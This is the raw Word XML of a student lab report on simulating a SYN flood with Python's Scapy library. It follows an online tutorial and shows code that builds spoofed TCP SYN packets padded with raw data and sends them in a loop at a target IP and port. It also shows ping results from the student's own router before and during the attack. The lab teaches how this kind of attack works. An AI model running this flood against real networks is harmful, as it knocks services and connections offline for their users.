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120" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="40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LAB05 - SYN flooding simulation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002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Class: M03  student ID: B2111933  Name: Truong Dang Truc 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Just for educational purpose, do not attack other system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:line="264" w:lineRule="auto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u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.thepythoncode.com/article/syn-flooding-attack-using-scapy-in-python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test system environment </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="861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6"/>
        <w:gridCol w:w="2862"/>
        <w:gridCol w:w="2838"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2916"/>
            <w:gridCol w:w="2862"/>
            <w:gridCol w:w="28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attacker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bed IP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 bed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Linux, Window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Ubuntu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Library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Scapy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Tool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64" w:lineRule="auto"/>
              <w:ind w:left="40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Wireshark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install Scapy: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pip3 install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scapy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Install Scapy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Open up a new Python file and import Scapy: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aa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scapy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3"/>
          <w:szCs w:val="23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731200" cy="66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import Scapy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 target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IP address on your program(attacking program)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022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target IP address (should be a testing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708090"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">router/firewall</w:t>
      </w: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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">target_ip = "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color w:val="ff0000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.1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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" =&gt; YOUR TEST BED IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024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the target port u want to flood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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">target_port = 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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forge IP packet with target ip as the destination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IP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dst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target_ip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or if you want to perform IP Spoofing (will work as well)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ip = IP(src=RandIP("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708090"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.1</w:t>
      </w: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/24"), dst=target_ip)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734050" cy="281245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566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2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Set up the target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forge our TCP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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># forge a TCP SYN packet with a random source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and the target port as the destination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tcp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TCP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sport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RandShort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dport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target_port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flags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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"S"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set the flags to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63384"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="fbfbfb" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"S"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which indicates the type SYN.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add some flooding raw data to occupy the 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add some flooding data (1KB in this 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raw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Raw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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">b"X"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stack up the layers and send the packet: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stack up the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ip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tcp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raw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B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708090"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># send the constructed packet in a loop until CTRL+C is detected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send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loop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 verbose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So we used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63384"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="fbfbfb" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">send()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function that sends packets at layer 3, we set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63384"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="fbfbfb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to 1 to keep sending until we hit CTRL+C, setting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d63384"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="fbfbfb" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">verbose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 to 0 will not print anything during the process (silent).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before="120" w:line="264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before="120" w:line="264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Prepare &amp; send the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verbose = 2 : implicit information only The script is done! Now, after I ran this against my router(target,victim), it took a few seconds, and sure enough, the router stopped working, and I lost connection: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final code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output of the following command on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120" w:line="264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bfbfb" w:val="clear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bfbfb" w:val="clear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fbfbfb" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t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4"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="fbfbfb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669900"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="fbfbfb" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.1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4"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="fbfbfb" w:val="clear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Ping the target when normal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731200" cy="510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0" w:right="0" w:firstLine="0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Ping the target when running the script, we can see that the transfers speed is much slower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64" w:lineRule="auto"/>
        <w:ind w:left="400" w:right="0" w:hanging="40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21252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To get everything back to normal, you can either stop the attack (by hitting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CTRL+C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), or if the device is still not responding, go on and reboot it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:widowControl w:val="1"/>
        <w:spacing w:after="0" w:before="120" w:line="264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0" w:before="120" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center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When we stopped the attack, out packets transfers speed become normal</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId1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Times New Roman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2358D"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:wordWrap w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr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 w:val="1"/>
    <w:rsid w:val="00E2358D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color w:val="2f5496" w:themeColor="accent1" w:themeShade="0000BF"/>
      <w:sz w:val="40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E2358D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:val="2f5496" w:themeColor="accent1" w:themeShade="0000BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a3">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E2358D"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz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E2358D"/>
    <w:pPr>
      <w:ind w:left="800" w:leftChars="400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00E2358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 w:val="1"/>
    <w:rsid w:val="00036EB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036EB6"/>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00036EB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036EB6"/>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="003F2A05"/>
    <w:rPr>
      <w:color w:val="0000ff"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="009330C0"/>
    <w:rPr>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="0018626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hepythoncode.com/article/syn-flooding-attack-using-scapy-in-pytho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vg/HsegMh36DNxVGoCxmHRV7OQ==">CgMxLjA4AHIhMVBDTnFUcU9EVGhiTjB3NGk2eF96Q0l3b2dtUzNCQVN6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2025-02-15T02:27:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
</cp:coreProperties>
</file>